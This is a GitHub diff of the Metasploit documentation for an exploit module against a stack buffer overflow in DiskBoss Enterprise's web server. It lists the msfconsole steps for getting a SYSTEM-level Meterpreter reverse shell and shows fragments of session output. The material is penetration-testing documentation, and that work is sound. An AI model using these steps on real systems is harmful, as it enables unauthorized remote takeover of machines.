You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Copy file name to clipboardExpand all lines: documentation/modules/exploit/windows/http/diskboss_get_bof.md
+10-6Lines changed: 10 additions & 6 deletions
Display the source diff
Display the rich diff
Original file line number
Diff line number
Diff line change
@@ -1,6 +1,6 @@
1
1
## Vulnerable Application
2
2
3
-
DiskBoss Enterprise versions up to v7.5.12 are affected by a stack-based buffer overflow vulnerability which can be leveraged by an attacker to execute arbitrary code in the context of NT AUTHORITY\SYSTEM on the target. The vulnerability is caused by improper bounds checking of the request path in HTTP GET requests sent to the built-in web server. This module has been tested successfully on Windows XP SP3 and Windows 7 SP1.
3
+
[DiskBoss Enterprise](http://www.diskboss.com) versions up to v7.5.12 are affected by a stack-based buffer overflow vulnerability which can be leveraged by an attacker to execute arbitrary code in the context of NT AUTHORITY\SYSTEM on the target. The vulnerability is caused by improper bounds checking of the request path in HTTP GET requests sent to the built-in web server. This module has been tested successfully on Windows XP SP3 and Windows 7 SP1. The vulnerable application is available for download at [Exploit-DB](https://www.exploit-db.com/apps/71a11b97d2361389b9099e57f6400270-diskbossent_setup_v7.4.28.exe).
4
4
5
5
## Verification Steps
6
6
1. Install a vulnerable DiskBoss Enterprise
@@ -10,16 +10,18 @@ DiskBoss Enterprise versions up to v7.5.12 are affected by a stack-based buffer
10
10
5. Check `Enable Web Server On Port 80` to start the web interface
11
11
6. Start `msfconsole`
12
12
7. Do `use exploit/windows/http/diskboss_get_bof`
13
-
8. Do `set rhost 192.168.198.130`
13
+
8. Do `set rhost ip`
14
14
9. Do `check`
15
15
10. Verify the target is vulnerable
16
16
11. Do `set payload windows/meterpreter/reverse_tcp`
17
-
12. Do `set lhost 192.168.198.138`
17
+
12. Do `set lhost ip`
18
18
13. Do `exploit`
19
19
14. Verify the Meterpreter session is opened
20
20
21
21
## Scenarios
22
22
23
+
###DiskBoss Enterprise v7.5.12 on Windows XP SP3
24
+
23
25
```
24
26
msf exploit(diskboss_get_bof) > options
25
27
@@ -68,10 +70,12 @@ System Language : en_US
68
70
Domain : WORKGROUP
69
71
Logged On Users : 2
70
72
Meterpreter : x86/win32
71
-
meterpreter > exit
72
-
[*] Shutting down Meterpreter...
73
+
meterpreter >
74
+
```
73
75
74
-
[*] 192.168.198.130 - Meterpreter session 1 closed. Reason: User exit
76
+
###DiskBoss Enterprise v7.4.28 on Windows 7 SP1
77
+
78
+
```
75
79
msf exploit(diskboss_get_bof) > set rhost 192.168.198.133
0 commit comments